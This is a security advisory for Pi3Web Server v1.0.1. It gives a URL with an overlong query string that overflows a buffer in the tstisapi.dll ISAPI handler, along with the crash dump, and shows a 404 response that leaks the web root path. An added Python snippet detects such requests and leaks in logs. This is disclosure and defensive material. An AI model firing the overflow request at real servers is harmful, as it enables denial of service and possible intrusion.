COMMAND

    Pi3Web Server

SYSTEMS AFFECTED

    Pi3Web Server v1.0.1

PROBLEM

    Joe Testa found the following. Pi3Web v1.0.1 is a web server. A
    vulnerability exists in the server's internal ISAPI handling
    procedures which results in a buffer overflow. The server also
    reveals the physical path of the web root upon encountering a 404
    error.

    Here is an example URL that overflows a buffer in Pi3Web's
    executable:

        http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

    This results in the following crash, in which EIP and the stack
    hold 41414141 (the 'A' bytes from the request):

        ENHPI3 caused an invalid page fault in
        module <unknown> at 0000:41414141.
        Registers:
        EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
        EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
        ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
        EDX=00000000 ES=0187 EDI=00000000 GS=0000
        Bytes at CS:EIP:
        
        Stack dump:
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 00bb0b2c 00000000 05611030

    To discover the physical path of the web root:

        http://localhost/[any string which causes a 404 error]

    The server responds with:

        The original URL path was:
        /sadfasdf
        
        The mapped physical path was:
        C:\PI3WEB\WebRoot\sadfasdf

SOLUTION

    The buffer overflow can be prevented by deleting the ISAPI module
    named 'tstisapi.dll'. There is no quick solution for the web
    root disclosure. The author, John Roy, was contacted on February
    5, 2001. No reply was received.
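
    For administrators who cannot remove the module immediately, the
    following added example (not part of the original advisory or of
    Pi3Web) flags oversized query strings sent to ISAPI DLLs in an access
    log and checks whether a 404 body discloses the physical path. The
    Common Log Format, the 256-byte threshold, and all function names are
    assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the advisory gives no overflow length, so this threshold is a tunable guess.
MAX_QUERY_LEN = 256
# Assumption: access log in Common Log Format; adjust for the server's real format.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Wording taken from the 404 page quoted in the advisory.
LEAK_RE = re.compile(r"The mapped physical path was:\s*(?P<path>[A-Za-z]:\\[^\r\n<]*)")


def oversized_isapi_requests(log_lines, max_query_len=MAX_QUERY_LEN):
    """Return (line_no, path, query_len) for oversized query strings sent to /isapi/*.dll."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        path = parts.path.lower()
        if (path.startswith("/isapi/") and path.endswith(".dll")
                and len(parts.query) > max_query_len):
            hits.append((line_no, parts.path, len(parts.query)))
    return hits


def leaked_physical_path(error_body):
    """Return the filesystem path disclosed by a 404 body, or None if none is shown."""
    m = LEAK_RE.search(error_body)
    return m.group("path").strip() if m else None


# Constructed sample data (not real traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [05/Feb/2001:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '127.0.0.1 - - [05/Feb/2001:10:00:05 +0000] "GET /isapi/tstisapi.dll?name=test HTTP/1.0" 200 512',
    '127.0.0.1 - - [05/Feb/2001:10:00:09 +0000] "GET /isapi/tstisapi.dll?' + "A" * 1000 + ' HTTP/1.0" 500 0',
]
SAMPLE_404 = ("The original URL path was:\n/sadfasdf\n\n"
              "The mapped physical path was:\nC:\\PI3WEB\\WebRoot\\sadfasdf\n")

if __name__ == "__main__":
    for hit in oversized_isapi_requests(SAMPLE_LOG):
        print("oversized ISAPI query:", hit)
    print("404 discloses:", leaked_physical_path(SAMPLE_404))
```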